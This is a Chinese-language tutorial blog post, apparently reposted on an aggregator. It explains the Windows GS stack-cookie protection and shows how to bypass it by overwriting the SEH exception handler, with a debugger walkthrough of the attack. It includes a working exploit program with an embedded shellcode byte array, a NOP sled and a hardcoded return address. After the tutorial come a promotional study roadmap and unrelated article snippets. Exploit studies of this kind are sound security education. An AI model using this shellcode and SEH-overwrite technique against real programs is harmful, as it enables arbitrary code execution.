Windows保护机制GS:原理及SEH异常处理突破

news2024/11/17 0:31:33

前言

本次文章只用于技术讨论,学习,切勿用于非法用途,用于非法用途与本人无关!

所有环境均为本地环境分析,且在本机进行学习。

GS机制并没有对SEH提供保护,换句话说我们可以通过攻击程序的异常处理达到绕过GS的目的。我们首先通过超长字符串覆盖掉异常处理函数指针,然后想办法触发一个异常,程序就会转入异常处理,由于异常处理函数指针已经被我们覆盖,那么我们就可以通过劫持SEH来控制程序的后续流程。作者:rkabyss

一、 GS提供的保护作用

  1. 修改栈帧中函数返回地址的经典攻击将被 GS 机制有效遏制;

  2. 基于改写函数指针的攻击,如对 C++虚函数的攻击,GS 机制仍然很难防御;

  3. 针对异常处理机制的攻击,GS 很难防御;

  4. GS 是对栈帧的保护机制,因此很难防御堆溢出的攻击。

二、GS原理

Security
Cookie是由.data段中第一个DWORD进行异或,在程序运行时.data段第一个DWORD一般是随机的,很难去预测它,所以把他当成安全cookie去使用。

Security Cookie一般在进入到函数中后会放在下图当中位置,如果要淹没返回地址一定会先淹没到Security
Cookie,在执行到ret返回时程序会调用一个叫做check函数去检查有没有出现问题,Security
Cookie在生成时会在栈里和.data段中各存放一个安全cookie,在执行ret时check会对栈中和.data段中cookie进行比较,如果不一样就判断程序被破坏,说明栈发生了溢出。

1651661886_62725c3eb05f61d781fe2.png!small?1651661887335

为了增加Security Cookie随机性,会用.data段第一个DWORD与栈中EBP进行异或操作,当ret时调用check函数再将其异或回去。

1651661920_62725c601ee287b250d3b.png!small?1651661920818

在Security Cookie代码中写了如过没有超过四字节是不会启动安全cookie的,如果要启动只能通过#pragma
strict_gs_check(on)使其强制开启。其实这也是绕过的一种方法。

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#pragma strict_gs_check(on)

int vulfuntion(char* str)
{
	char arry[4];
	strcpy(arry, str);
	return 1;
}

int main()
{
	char* str = "123123123123123123123123123";
	vultest(str);
	return 0;
}

因为他是带有符号的,直接跳转到main就可以找到主函数。

1651662011_62725cbb5af60c778a61e.png!small?1651662012071

看到Security Cookie生成的安全cookie放到了EAX寄存器中,为了增加安全cookie随机性,安全cookie又与EBP进行异或。

1651662020_62725cc4a533b6c3f0311.png!small?1651662021418

跳转到EBP可以看到,00F3F92C为EBP下边009AD71E为返回地址。

1651662029_62725ccd668ab4bde8d3b.png!small?1651662030158

将安全cookie放入到了EAX寄存器中。

1651662039_62725cd7866250b7f0ac6.png!small?1651662040320

安全cookie与EBP异或完将其放入到EBP-4位置,在堆栈中可以看到。

1651662049_62725ce1b5babb8fed989.png!small?1651662050516

通过上边代码可以看到copy的字符串远大于要传输的空间,所以造成了栈溢出,已将安全cookie、EBP、返回地址全部淹没。如果正常情况下已经可以进行利用,而有了安全cookie之后,在下方使用check函数进行了判断,判断异常直接飞掉。

1651662066_62725cf2aaa0761e9482b.png!small?1651662067445

在调用到check函数之前将安全cookie保存到了ECX中,前面为了增加随机性进行了异或,现在将其进行了恢复。

1651662077_62725cfd02a3763775129.png!small?1651662077795

三、SEH异常突破GS

函数test中存在典型的栈溢出漏洞。在strcpy操作后变量buf会被溢出,当字符串足够长的时候程序的SEH异常处理句柄也会被淹没。由于strcpy的溢出,覆盖了input的地址,会造成strcat从一个非法地址读取数据,这时会触发异常,程序转入异常处理,这样就可以在程序检查Security
Cookie前将程序流程劫持。

#include <stdafx.h>
#include <string.h>
char shellcode[]=
"\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C"
"\x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53"
"\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B"
"\x49\x1C\x8B\x09\x8B\x69\x08\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95"
"\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59"
"\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A"
"\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75"
"\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03"
"\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9\x33\xDB"
"\x53\x68\x77\x65\x73\x74\x68\x66\x61\x69\x6C\x8B\xC4\x53\x50\x50"
"\x53\xFF\x57\xFC\x53\xFF\x57\xF8\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\xA0\xFE\x12\x00"//address of shellcode
;

void test(char * input)
{
	
	char buf[200];
	strcpy(buf,input);
    strcat(buf,input);
}

void main()
{
	test(shellcode);	
}

根据release中32程序规则,主函数有三个参数,判断下方call为主函数。

1651662122_62725d2a29e5be4018ecb.png!small?1651662122871

进入到主函数看到call,其实就是test函数,直接进入到test函数当中去。

1651662132_62725d348d2aca745658d.png!small?1651662133279

可以看到整体逻辑如前面原理讲的一样,首先获取到安全cookie保存到EAX当中并与EBP进行异或,在结束时候又将其进行恢复。

1651662142_62725d3edd1443e2cf404.png!small?1651662143624

执行到strcpy函数位置观察栈空间,EBP-4位置为安全cookie,EBP+4为返回地址,EBP+8是参数。后面ESP+44为SE处理程序。

1651662154_62725d4a1fa671603e294.png!small?1651662154865

执行完strcpy函数,观察栈空间发现SE处理程序地址已经被覆盖为shellcode起始地址。

1651662163_62725d53cd3353853e04b.png!small?1651662164505

执行到strcat函数,观察到EBP+8位置已经被覆盖,EBP+8是源字符串,覆盖之后是一个不可访问地址。执行strcat函数会直接进行异常处理,因为源字符串为不可访问地址,而异常处理地址为shellcode起始地址。

1651662172_62725d5c5c04ac5a77e4b.png!small?1651662173040

触发异常处理,进入到shellcode当中,接下来会运行shellcode代码。

1651662180_62725d64b7fcc1c4aaff2.png!small?1651662181429

五、总结

现在很多程序都带有GS,在分析程序的时候发现了缺陷,却因为保护利用不了,先掌握一些突破GS方法,在之后遇到时能将其运用到,之后会对其他一些突破方法进行复现。

最后

分享一个快速学习【网络安全】的方法,「也许是」最全面的学习方法:
1、网络安全理论知识(2天)
①了解行业相关背景,前景,确定发展方向。
②学习网络安全相关法律法规。
③网络安全运营的概念。
④等保简介、等保规定、流程和规范。(非常重要)

2、渗透测试基础(一周)
①渗透测试的流程、分类、标准
②信息收集技术:主动/被动信息搜集、Nmap工具、Google Hacking
③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察
④主机攻防演练:MS17-010、MS08-067、MS10-046、MS12-20等

3、操作系统基础(一周)
①Windows系统常见功能和命令
②Kali Linux系统常见功能和命令
③操作系统安全(系统入侵排查/系统加固基础)

4、计算机网络基础(一周)
①计算机网络基础、协议和架构
②网络通信原理、OSI模型、数据转发流程
③常见协议解析(HTTP、TCP/IP、ARP等)
④网络攻击技术与网络安全防御技术
⑤Web漏洞原理与防御:主动/被动攻击、DDOS攻击、CVE漏洞复现

5、数据库基础操作(2天)
①数据库基础
②SQL语言基础
③数据库安全加固

6、Web渗透(1周)
①HTML、CSS和JavaScript简介
②OWASP Top10
③Web漏洞扫描工具
④Web渗透工具:Nmap、BurpSuite、SQLMap、其他(菜刀、漏扫等)

在这里插入图片描述

恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;如果等保模块学的好,还可以从事等保工程师。薪资区间6k-15k。

到此为止,大概1个月的时间。你已经成为了一名“脚本小子”。那么你还想往下探索吗?

想要入坑黑客&网络安全的朋友,给大家准备了一份:282G全网最全的网络安全资料包免费领取!
扫下方二维码,免费领取

有了这些基础,如果你要深入学习,可以参考下方这个超详细学习路线图,按照这个路线学习,完全够支撑你成为一名优秀的中高级网络安全工程师:

高清学习路线图或XMIND文件(点击下载原文件)

还有一些学习中收集的视频、文档资源,有需要的可以自取:
每个成长路线对应板块的配套视频:


当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。

因篇幅有限,仅展示部分资料,需要的可以【扫下方二维码免费领取】

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/349374.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

【java 高并发编程之JUC】2w字带你JUC从入门到精通

点击查看脑图目录地址,实时更新 1 什么是 JUC 1.1 JUC 简介 在 Java 中&#xff0c;线程部分是一个重点&#xff0c;本篇文章说的 JUC 也是关于线程的。JUC 就是 java.util .concurrent 工具包的简称。这是一个处理线程的工具包&#xff0c;JDK 1.5 开始出现的。 1.2 进程与…

Leetcode_part1

Content [1. Two Sum](https://leetcode.com/problems/two-sum/)Solution 1Solution 2[递归: 17. 电话号码的字母组合](https://leetcode.com/problems/letter-combinations-of-a-phone-number/)Solution 1 暴力Soulution 2 回溯Solution 3 队列[18. 四数之和](https://leetcod…

app截图+识别截图中的文字

在自动化测试的过程中&#xff0c;我们会经常遇到需要进行文字识别的场景&#xff0c;比如 识别验证码、识别截图中的文字、读取截图中的数值 等等&#xff0c;遇到这些情况时我们可以如何处理呢&#xff1f; 本机要有PaddleOCR环境&#xff0c;PaddleOCR可参考我另一篇 Padd…

存储类别、链接与内存管理(二)

0、前言概要 本篇来自于我的另外一篇博客存储类别、链接与内存管理&#xff08;一&#xff09;的续篇&#xff0c;主要分析了C语言中的不同存储类别、关键字以及使用的注意事项 1、自动变量 &#xff08;1&#xff09;属性 自动存储期、块作用域、无连接 &#xff08;2&a…

vue项目实现会议预约(包含某天的某个时间段和某月的某几天)

一、一天的时间段预约 会议预约有以下操作&#xff1a; 1.点击预约按钮&#xff0c;弹窗最近一周的预约时间点&#xff08;半小时一个点&#xff09;&#xff0c;预约时间为5:00到24:00; 2.超过当前时间的时间点不允许再预约&#xff0c;已经预约的时间不允许再预约&#xff0c…

【C++】类和对象三大特性--继承

文章目录1.继承的概念及定义1.1继承的概念1.2 继承定义1.2.1定义格式1.2.2继承关系和访问限定符1.2.3继承基类成员访问方式的变化2.基类和派生类对象赋值转换3.继承中的作用域4.派生类的默认成员函数5.继承与友元6. 继承与静态成员7.复杂的菱形继承及菱形虚拟继承虚拟继承解决数…

医疗器械实验室设计规划全了SICOLAB

一、通用型实验室医疗器械物理性能能检测中&#xff0c;有部分通用型试验&#xff0c;可覆盖不同产品检测&#xff0c;这些实验室需要重点考虑、设计。1、微粒检测室微粒检测室用于医疗器械产品微粒检测&#xff0c;包括微粒、落絮、药液滤除率等项目。微粒检测室要求为洁净室&…

学习笔记<二> MySQL学习(3):分库、分表

文章目录为什么分库分表一、垂直分片、水平分片二、常用的数据分片策略三、垂直分表、垂直分库、水平分库、水平分表四、垂直切分、水平切分优缺点五、数据分片规则六、分库分表带来的问题本文参考博主「小Y是我的」的文章&#xff0c;原文链接&#xff1a;https://blog.csdn.n…

Android基础练习解答【1】

文章目录第一章课后练习题一填空题二 判断题&#xff08;正确打√&#xff0c;错误打&#xff09;三 选择题四 简答题第一章课后练习题 一填空题 Android是基于_Linux _ 的移动端开源操作系统。 解答&#xff1a;安卓&#xff08;Android&#xff09;是一种基于Linux内核&…

C语言深度解剖-关键字(7)

目录 switch case 语句 理解&#xff1a; 补充&#xff1a; 深入理解&#xff1a; default 语句&#xff1a; case语句&#xff1a; 总结&#xff1a; do、while、for 关键字 while for do while 各种死循环方法&#xff1a; while for do while getchar 写在…

企业电子招投标采购系统源码之功能模块的描述

功能模块&#xff1a; 待办消息&#xff0c;招标公告&#xff0c;中标公告&#xff0c;信息发布 描述&#xff1a; 全过程数字化采购管理&#xff0c;打造从供应商管理到采购招投标、采购合同、采购执行的全过程数字化管理。通供应商门户具备内外协同的能力&#xff0c;为外部供…

【Spark分布式内存计算框架——Spark SQL】6. 数据处理分析

第四章 数据处理分析 在SparkSQL模块中&#xff0c;将结构化数据封装到DataFrame或Dataset集合中后&#xff0c;提供两种方式分析处理数据&#xff0c;正如前面案例【词频统计WordCount】两种方式&#xff1a; 第一种&#xff1a;DSL&#xff08;domain-specific language&am…

数据库(四)

第五章 MySQL备份恢复 5.1 MySQL日志管理 在数据库保存数据时&#xff0c;有时候不可避免会出现数据丢失或者被破坏&#xff0c;在这样情况下&#xff0c;我们必须保证数据的安全性和完整性&#xff0c;就需要使用日志来查看或者恢复数据了。 数据库中数据丢失或被破坏可能原…

人工智能 LLM 革命前夜:一文读懂ChatGPT缘起的自然语言处理模型Transformer

作者&#xff1a;钟超 阿里集团大淘宝团队 [01] https://web.stanford.edu/~jurafsky/slp3/3.pdf [02] https://ai.googleblog.com/2017/08/transformer-novel-neural-network.html [03] 《自然语言处理&#xff1a;基于预训练模型的方法》车万翔 等著 [04] https://cs.stanfo…

如何系统的、阶段的学习Java开发,真正的从入门到精通

Java 后端有着非常庞大的生态圈&#xff0c;也涉及到很多复杂的问题&#xff0c;如分布式事务、分布式查询、微服务、高并发、容灾、容器化等等&#xff0c;涉及到的技术栈和框架就更多了。不过&#xff0c;我们目前只是为了快速入门&#xff0c;我们只会学习最必要的那些知识&…

ubuntu18.04下pytorch版Maskrcnn编译错误汇总

ubuntu18.04下pytorch版Maskrcnn编译错误汇总1 anconda环境配置2 bug及解决办法2.1 Detected CUDA version (11.2) mismatches the version that was used to compile PyTorch(10.2)2.2 error: legacy-install-failure Encountered error while trying to install package.╰─…

Cron表达式 的含义、相关知识点及相关表达式示例

学习目标&#xff1a; 本篇博文学习目标如下: 掌握 Cron表达式 学习内容&#xff1a; Cron表达式&#xff1a; 1、Cron表达式的含义&#xff1a; Cron表达式是一个具有时间含义的字符串&#xff0c;字符串以5-6个空格隔开&#xff0c;分为6~7个域&#xff0c;格式为X X X X …

一文讲透sparkHistoryServer与yarnHistoryServer关系

1、spark history 和 yarn history 的区别&#xff1f; Spark History Server 和 YARN History Server 是用于查看和分析Spark和YARN 应用程序的执行情况的两个不同的工具。 Spark历史服务器是专门用于Spark应用程序的工具&#xff0c;它提供了一个界面&#xff0c;可以查看S…

移动机器人设计与实践课程大纲

MiR移动机器人参考资料&#xff1a;图一 西北工业大学-课程平台图二 清华大学出版社-移动机器人目前&#xff0c;基本都是双一流大学开设此类课程&#xff0c;并且都是至少3-4学分&#xff0c;16学时/学分&#xff0c;48-64学时。(⊙﹏⊙)&#xff0c;难办了。咱这只有&#xf…

C++学习笔记-数据类型

在用任何语言编写程序时&#xff0c;需要使用各种变量来存储各种信息。 变量只是用于存储值的保留内存位置。 这意味着当创建变量时&#xff0c;在内存中保留了一些空间。 可能希望存储各种数据类型的信息&#xff0c;如字符&#xff0c;宽字符&#xff0c;整数&#xff0c;浮…